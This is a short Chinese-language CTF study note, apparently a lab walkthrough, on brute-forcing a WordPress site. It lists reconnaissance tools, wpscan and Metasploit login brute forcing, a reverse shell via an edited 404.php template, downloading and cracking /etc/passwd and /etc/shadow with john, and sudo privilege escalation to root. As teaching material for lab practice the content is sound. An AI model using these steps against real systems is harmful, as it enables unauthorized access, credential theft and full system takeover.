我的CTF学习与教学之旅笔记10

WEB安全暴力破解

  利用nmap 、dirb 、nikto对目标网站进探测

经验发现有类似的wordpress站点，可能已经改名为secret，想办法找到wp-login.php

也有可能发现wp-admin 或者 wp-content/thems/twentyfifth/404.php等等

发现的wp-login.php登录时，可以尝试弱口令：admin、123456。居然成功：admin

但我们还是来用暴力破解一下：

利用wpscan枚举该wordpress站点的用户名和密码，命令如下：

wpscan --url http://ip --enumerate u      枚举用户

此时有可能得到admin用户

启动msfconsole

use auxiliary/http/scanner/wordpress_login_enum

set rhost

set  pass_file /usr/share/wordlist/dirb/common.txt

set username admin

set targeturi /secret/

run

如果网站中有域名不能够识别，则在/etc/hosts中修改映射关系，使之能够访问

如：192.168.208.157       www.vsdomain.com

192.168.208.157       vsdomain  

通过上述获取到密码，可以登录wordpress后台，利用修改404.php模板，进行反射

msfconsole启动监听，进入meterpreter

在meterpreter中，download /etc/passwd

download /etc/shadow

在kali系统中：用unshadow passwd shadow > cracked

john cracked

也可以：

显示用户密码

回到meterpreter

先切换到marlinspike用户

su - marlinspike       

进入命令行

python -c "import pty;pty.spawn('/bin/bash')"

sudo  -l  提权

sudo bash

或者

marlinspike@vtcsec:~$ sudo su -
提升为root